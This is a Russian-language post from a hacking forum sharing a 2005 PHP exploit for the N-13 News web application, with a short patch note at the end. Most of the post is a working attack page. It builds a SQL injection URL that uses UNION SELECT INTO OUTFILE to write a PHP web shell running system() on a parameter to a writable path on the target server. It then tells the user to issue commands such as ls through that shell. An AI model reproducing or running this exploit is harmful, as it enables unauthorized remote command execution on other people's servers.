• XSS.stack #1 – первый литературный журнал от юзеров форума

Web N-13 News

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
Эксплоит для N-13 News

Код сплойта:
Код:
<?php
###  0 day -- 29/11/2005
###
###	N-13 News Remote SQL / PHP-Shell Injection  
###
###	Just upload in a web-server with mod_php
###	and run it trhough your browser;)
###
###	Affected Software : http://network-13.com/  N-13 News
###	Version: All
###	Exploit discovere and written by: KingOfSka  <at>  http://contropotere.altervista.org
###	Condition: Magic Quotes OFF
###     A world writeable directory accessible trough HTTP
###	To detect Server Path to N-13 just visit: http://www.site.com/n13/index.php?id=0'
###
?>
<html>
<head>
<title> .::KingOfSka N-13 News Remote PHP Shell Injection::. || http://contropotere.altervista.org
|| </title>
</head>
<body>
<header> .::KingOfSka N-13 News PHP Shell Injection::. || <a href =
"http://contropotere.altervista.org/limbo/"> Contro Potere Hacking Crew </a> || </header> 



<?php
if (isset($_POST['url'])) {
$url = $_POST['url'];
$path2news = $_POST['path2news'];
$outfile = $_POST ['outfile'];
$sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile";
$sql = urlencode($sql);
$expurl= $url."?id=".$sql;
echo '<a href='.$expurl.'> Click Here to Exploit </a> 
';
echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results";
}
else
{
?>
Url to index.php: 
 
<form action = "<?php echo "$_SERVER[PHP_SELF]"; ?>" method = "post">
<input type = "text" name = "url" value = "http://www.site.com/n13/index.php" size = "50"> 

Server Path to Shell: 

Full server path to a writable file which will contain the Php Shell 

<input type = "text" name = "outfile" value = "/var/www/localhost/htdocs/n13/shell.php" size = "50">

 

<input type = "submit" value = "Create Exploit"> 
 

<?php
}
?>
</body>
</html>

Патч:
Отредактируйте свой .htaccess в строчках:
Код:
php_flag magic_quotes_gpc off
Заменить
Код:
php_flag magic_quotes_gpc on
И ваш сайт будет не подвержен данному эксплоиту.

:zns2: Производитель
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх